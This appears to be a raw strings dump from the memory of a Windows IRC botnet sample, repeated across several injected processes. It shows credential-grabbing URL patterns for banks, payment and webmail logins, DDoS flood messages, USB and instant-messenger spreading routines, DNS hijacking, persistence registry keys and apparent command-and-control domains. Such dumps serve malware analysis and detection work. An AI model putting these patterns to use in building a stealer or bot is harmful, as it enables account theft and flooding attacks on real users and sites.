%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
a.baerr000.ru
a.joerv06.com
a.tsroxybaa.com
fbi.gov
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\312a36d2
C:\Windows\system32\csrss.exe
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Windows\System32\csrss.exe'C:\Windows\system32\csrss.exec:\%original file name%.exewinlogon.exe_416_rwx_006F0000_0004E000:.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0pFv.TBv%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dPTF://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhXXp://%s/%shXXp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)hXXp://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Runicon=shell32.dll,7shellexecute=%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %Ã%%%s/c "start %Ã%%.Trashes\%s.Trashes\\.\%c:%s\%s%sautorun.tmp%sautorun.inf%0x.scr*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dlla.baerr000.rua.joerv06.coma.tsroxybaa.comfbi.gov]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhXXp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\312a36d2C:\Windows\system32\winlogon.exeC:\WindowsC:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Windows\System32\winlogon.exerc:\%original file name%.execonhost.exe_1456_rwx_00210000_0004E000:.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0"Fv.TBv%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dPTF://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhXXp://%s/%shXXp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)hXXp://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Runicon=shell32.dll,7shellexecute=%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %Ã%%%s/c "start %Ã%%.Trashes\%s.Trashes\\.\%c:%s\%s%sautorun.tmp%sautorun.inf%0x.scr*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dlla.baerr000.rua.joerv06.coma.tsroxybaa.comfbi.gov]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhXXp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\312a36d2C:\Windows\system32\conhost.exeC:\WindowsC:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Windows\System32\conhost.exe(C:\Windows\system32\conhost.exe$c:\%original file name%.exeDwm.exe_2008_rwx_004C0000_0004E000:.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0MFv.TBv%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dPTF://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhXXp://%s/%shXXp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)hXXp://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Runicon=shell32.dll,7shellexecute=%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %Ã%%%s/c "start %Ã%%.Trashes\%s.Trashes\\.\%c:%s\%s%sautorun.tmp%sautorun.inf%0x.scr*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dlla.baerr000.rua.joerv06.coma.tsroxybaa.comfbi.gov]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhXXp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\312a36d2C:\Windows\system32\Dwm.exeC:\WindowsC:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" 